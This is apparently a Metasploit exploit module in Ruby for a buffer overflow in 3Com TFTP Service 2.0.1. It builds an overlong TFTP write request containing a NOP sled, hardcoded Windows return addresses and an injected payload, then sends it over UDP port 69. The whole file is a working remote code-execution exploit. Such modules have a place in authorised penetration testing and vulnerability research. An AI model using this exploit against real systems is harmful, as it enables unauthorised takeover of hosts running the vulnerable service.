require 'msf/core'module Msf
class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote
include Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',
'Description' => %q{
3Com TFTP Service version 2.0.1 suffers from a long type buffer
overflow during a write TFTP request. Does not require write access
to be enabled on the server.
Attacker controls ESI.
Liu Qixu of NCNIPC published this vulnerability.
},
'Author' => 'grutz [at] jingojango.net',
'Version' => '$$',
'References' =>
[
['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
['BID', '21301'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 440,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 All SP English', { 'Ret' => 0x750217ae } ], # call esi ws2help
['Windows XP SP2 English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
['Windows NT SP5/6 English', { 'Ret' => 0x776a117e } ], # call esi ws2help
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Nov 27 2006'
))
register_options(
[
Opt::RPORT(69)
], self)
end
def exploit
connect_udp
print_status("Trying target #{target.name}...")
sploit =
"\x00\x02" +
Rex::Text.rand_text_english(1, payload_badchars) +
"\x00" +
make_nops(473) +
[target.ret].pack('V') +
"\x00"
sploit[9, payload.encoded.length] = payload.encoded
udp_sock.put(sploit)
disconnect_udp
end
end
end